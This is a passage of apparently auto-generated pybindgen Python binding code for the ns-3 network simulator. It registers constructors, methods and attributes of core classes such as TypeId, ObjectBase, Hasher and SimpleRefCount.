## attribute-construction-list.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeConstructionList::Find(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('Find',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True)
return
def register_Ns3AttributeConstructionListItem_methods(root_module, cls):
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item() [constructor]
cls.add_constructor([])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item(ns3::AttributeConstructionList::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeConstructionList::Item const &', 'arg0')])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::value [variable]
cls.add_instance_attribute('value', 'ns3::Ptr< ns3::AttributeValue >', is_const=False)
return
def register_Ns3CallbackBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::CallbackBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::Ptr<ns3::CallbackImplBase> ns3::CallbackBase::GetImpl() const [member function]
cls.add_method('GetImpl',
'ns3::Ptr< ns3::CallbackImplBase >',
[],
is_const=True)
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::Ptr<ns3::CallbackImplBase> impl) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::CallbackImplBase >', 'impl')],
visibility='protected')
## callback.h (module 'core'): static std::string ns3::CallbackBase::Demangle(std::string const & mangled) [member function]
cls.add_method('Demangle',
'std::string',
[param('std::string const &', 'mangled')],
is_static=True, visibility='protected')
return
def register_Ns3Hasher_methods(root_module, cls):
## hash.h (module 'core'): ns3::Hasher::Hasher(ns3::Hasher const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Hasher const &', 'arg0')])
## hash.h (module 'core'): ns3::Hasher::Hasher() [constructor]
cls.add_constructor([])
## hash.h (module 'core'): ns3::Hasher::Hasher(ns3::Ptr<ns3::Hash::Implementation> hp) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::Hash::Implementation >', 'hp')])
## hash.h (module 'core'): uint32_t ns3::Hasher::GetHash32(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('char const *', 'buffer'), param('size_t const', 'size')])
## hash.h (module 'core'): uint32_t ns3::Hasher::GetHash32(std::string const s) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('std::string const', 's')])
## hash.h (module 'core'): uint64_t ns3::Hasher::GetHash64(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash64',
'uint64_t',
[param('char const *', 'buffer'), param('size_t const', 'size')])
## hash.h (module 'core'): uint64_t ns3::Hasher::GetHash64(std::string const s) [member function]
cls.add_method('GetHash64',
'uint64_t',
[param('std::string const', 's')])
## hash.h (module 'core'): ns3::Hasher & ns3::Hasher::clear() [member function]
cls.add_method('clear',
'ns3::Hasher &',
[])
return
def register_Ns3ObjectBase_methods(root_module, cls):
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase() [constructor]
cls.add_constructor([])
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase(ns3::ObjectBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectBase const &', 'arg0')])
## object-base.h (module 'core'): void ns3::ObjectBase::GetAttribute(std::string name, ns3::AttributeValue & value) const [member function]
cls.add_method('GetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'value')],
is_const=True)
## object-base.h (module 'core'): bool ns3::ObjectBase::GetAttributeFailSafe(std::string name, ns3::AttributeValue & attribute) const [member function]
cls.add_method('GetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'attribute')],
is_const=True)
## object-base.h (module 'core'): ns3::TypeId ns3::ObjectBase::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## object-base.h (module 'core'): static ns3::TypeId ns3::ObjectBase::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## object-base.h (module 'core'): void ns3::ObjectBase::SetAttribute(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::SetAttributeFailSafe(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): void ns3::ObjectBase::ConstructSelf(ns3::AttributeConstructionList const & attributes) [member function]
cls.add_method('ConstructSelf',
'void',
[param('ns3::AttributeConstructionList const &', 'attributes')],
visibility='protected')
## object-base.h (module 'core'): void ns3::ObjectBase::NotifyConstructionCompleted() [member function]
cls.add_method('NotifyConstructionCompleted',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3ObjectDeleter_methods(root_module, cls):
## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter() [constructor]
cls.add_constructor([])
## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter(ns3::ObjectDeleter const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectDeleter const &', 'arg0')])
## object.h (module 'core'): static void ns3::ObjectDeleter::Delete(ns3::Object * object) [member function]
cls.add_method('Delete',
'void',
[param('ns3::Object *', 'object')],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount(ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3TypeId_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## type-id.h (module 'core'): ns3::TypeId::TypeId(char const * name) [constructor]
cls.add_constructor([param('char const *', 'name')])
## type-id.h (module 'core'): ns3::TypeId::TypeId() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TypeId(ns3::TypeId const & o) [copy constructor]
cls.add_constructor([param('ns3::TypeId const &', 'o')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, uint32_t flags, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('uint32_t', 'flags'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor) [member function]
cls.add_method('AddTraceSource',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation ns3::TypeId::GetAttribute(uint32_t i) const [member function]
cls.add_method('GetAttribute',
'ns3::TypeId::AttributeInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetAttributeFullName(uint32_t i) const [member function]
cls.add_method('GetAttributeFullName',
'std::string',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetAttributeN() const [member function]
cls.add_method('GetAttributeN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): ns3::Callback<ns3::ObjectBase*,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::TypeId::GetConstructor() const [member function]
cls.add_method('GetConstructor',
'ns3::Callback< ns3::ObjectBase *, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetGroupName() const [member function]
cls.add_method('GetGroupName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetHash() const [member function]
cls.add_method('GetHash',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetName() const [member function]
cls.add_method('GetName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::GetParent() const [member function]
cls.add_method('GetParent',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::GetRegistered(uint32_t i) [member function]
cls.add_method('GetRegistered',
'ns3::TypeId',
[param('uint32_t', 'i')],
is_static=True)
## type-id.h (module 'core'): static uint32_t ns3::TypeId::GetRegisteredN() [member function]
cls.add_method('GetRegisteredN',
'uint32_t',
[],
is_static=True)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation ns3::TypeId::GetTraceSource(uint32_t i) const [member function]
cls.add_method('GetTraceSource',
'ns3::TypeId::TraceSourceInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetTraceSourceN() const [member function]
cls.add_method('GetTraceSourceN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): uint16_t ns3::TypeId::GetUid() const [member function]
cls.add_method('GetUid',
'uint16_t',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasConstructor() const [member function]
cls.add_method('HasConstructor',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasParent() const [member function]
cls.add_method('HasParent',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::HideFromDocumentation() [member function]
cls.add_method('HideFromDocumentation',
'ns3::TypeId',
[])
## type-id.h (module 'core'): bool ns3::TypeId::IsChildOf(ns3::TypeId other) const [member function]
cls.add_method('IsChildOf',
'bool',
[param('ns3::TypeId', 'other')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::LookupAttributeByName(std::string name, ns3::TypeId::AttributeInformation * info) const [member function]
cls.add_method('LookupAttributeByName',
'bool',
[param('std::string', 'name'), param('ns3::TypeId::AttributeInformation *', 'info', transfer_ownership=False)],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByHash(uint32_t hash) [member function]
cls.add_method('LookupByHash',
'ns3::TypeId',
[param('uint32_t', 'hash')],
is_static=True)
## type-id.h (module 'core'): static bool ns3::TypeId::LookupByHashFailSafe(uint32_t hash, ns3::TypeId * tid) [member function]
cls.add_method('LookupByHashFailSafe',
'bool',
[param('uint32_t', 'hash'), param('ns3::TypeId *', 'tid')],
is_static=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByName(std::string name) [member function]
cls.add_method('LookupByName',
'ns3::TypeId',
[param('std::string', 'name')],
is_static=True)
## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name) const [member function]
cls.add_method('LookupTraceSourceByName',
'ns3::Ptr< ns3::TraceSourceAccessor const >',
[param('std::string', 'name')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::MustHideFromDocumentation() const [member function]
cls.add_method('MustHideFromDocumentation',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::SetAttributeInitialValue(uint32_t i, ns3::Ptr<ns3::AttributeValue const> initialValue) [member function]
cls.add_method('SetAttributeInitialValue',
'bool',
[param('uint32_t', 'i'), param('ns3::Ptr< ns3::AttributeValue const >', 'initialValue')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetGroupName(std::string groupName) [member function]
cls.add_method('SetGroupName',
'ns3::TypeId',
[param('std::string', 'groupName')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetParent(ns3::TypeId tid) [member function]
cls.add_method('SetParent',
'ns3::TypeId',
[param('ns3::TypeId', 'tid')])
## type-id.h (module 'core'): void ns3::TypeId::SetUid(uint16_t tid) [member function]
cls.add_method('SetUid',
'void',
[param('uint16_t', 'tid')])
return
def register_Ns3TypeIdAttributeInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation(ns3::TypeId::AttributeInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::AttributeInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::AttributeAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::flags [variable]
cls.add_instance_attribute('flags', 'uint32_t', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::initialValue [variable]
cls.add_instance_attribute('initialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::originalInitialValue [variable]
cls.add_instance_attribute('originalInitialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
return
def register_Ns3TypeIdTraceSourceInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation(ns3::TypeId::TraceSourceInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::TraceSourceInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::TraceSourceAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
return
def register_Ns3Vector2D_methods(root_module, cls):
cls.add_output_stream_operator()
## vector.h (module 'core'): ns3::Vector2D::Vector2D(ns3::Vector2D const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector2D const &', 'arg0')])
## vector.h (module 'core'): ns3::Vector2D::Vector2D(double _x, double _y) [constructor]
cls.add_constructor([param('double', '_x'), param('double', '_y')])
## vector.h (module 'core'): ns3::Vector2D::Vector2D() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector2D::x [variable]
cls.add_instance_attribute('x', 'double', is_const=False)
## vector.h (module 'core'): ns3::Vector2D::y [variable]
cls.add_instance_attribute('y', 'double', is_const=False)
return
def register_Ns3Vector3D_methods(root_module, cls):
cls.add_output_stream_operator()
## vector.h (module 'core'): ns3::Vector3D::Vector3D(ns3::Vector3D const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector3D const &', 'arg0')])
## vector.h (module 'core'): ns3::Vector3D::Vector3D(double _x, double _y, double _z) [constructor]
cls.add_constructor([param('double', '_x'), param('double', '_y'), param('double', '_z')])
## vector.h (module 'core'): ns3::Vector3D::Vector3D() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector3D::x [variable]
cls.add_instance_attribute('x', 'double', is_const=False)
## vector.h (module 'core'): ns3::Vector3D::y [variable]
cls.add_instance_attribute('y', 'double', is_const=False)
## vector.h (module 'core'): ns3::Vector3D::z [variable]
cls.add_instance_attribute('z', 'double', is_const=False)
return
def register_Ns3Empty_methods(root_module, cls):
## empty.h (module 'core'): ns3::empty::empty() [constructor]
cls.add_constructor([])
## empty.h (module 'core'): ns3::empty::empty(ns3::empty const & arg0) [copy constructor]
cls.add_constructor([param('ns3::empty const &', 'arg0')])
return
def register_Ns3Object_methods(root_module, cls):
## object.h (module 'core'): ns3::Object::Object() [constructor]
cls.add_constructor([])
## object.h (module 'core'): void ns3::Object::AggregateObject(ns3::Ptr<ns3::Object> other) [member function]
cls.add_method('AggregateObject',
'void',
[param('ns3::Ptr< ns3::Object >', 'other')])
## object.h (module 'core'): void ns3::Object::Dispose() [member function]
cls.add_method('Dispose',
'void',
[])
## object.h (module 'core'): ns3::Object::AggregateIterator ns3::Object::GetAggregateIterator() const [member function]
cls.add_method('GetAggregateIterator',
'ns3::Object::AggregateIterator',
[],
is_const=True)
## object.h (module 'core'): ns3::TypeId ns3::Object::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## object.h (module 'core'): static ns3::TypeId ns3::Object::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## object.h (module 'core'): void ns3::Object::Initialize() [member function]
cls.add_method('Initialize',
'void',
[])
## object.h (module 'core'): ns3::Object::Object(ns3::Object const & o) [copy constructor]
cls.add_constructor([param('ns3::Object const &', 'o')],
visibility='protected')
## object.h (module 'core'): void ns3::Object::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## object.h (module 'core'): void ns3::Object::DoInitialize() [member function]
cls.add_method('DoInitialize',
'void',
[],
visibility='protected', is_virtual=True)
## object.h (module 'core'): void ns3::Object::NotifyNewAggregate() [member function]
cls.add_method('NotifyNewAggregate',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3ObjectAggregateIterator_methods(root_module, cls):
## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator(ns3::Object::AggregateIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Object::AggregateIterator const &', 'arg0')])
## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator() [constructor]
cls.add_constructor([])
## object.h (module 'core'): bool ns3::Object::AggregateIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## object.h (module 'core'): ns3::Ptr<ns3::Object const> ns3::Object::AggregateIterator::Next() [member function]
cls.add_method('Next',
'ns3::Ptr< ns3::Object const >',
[])
return
def register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter< ns3::AttributeAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter< ns3::AttributeChecker > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter< ns3::AttributeValue > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount(ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter< ns3::CallbackImplBase > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3HashImplementation_Ns3Empty_Ns3DefaultDeleter__lt__ns3HashImplementation__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter< ns3::Hash::Implementation > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter< ns3::TraceSourceAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3TraceSourceAccessor_methods(root_module, cls):
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor(ns3::TraceSourceAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TraceSourceAccessor const &', 'arg0')])
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor() [constructor]
cls.add_constructor([])
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Connect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Connect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::ConnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('ConnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Disconnect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Disconnect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::DisconnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('DisconnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AntennaModel_methods(root_module, cls):
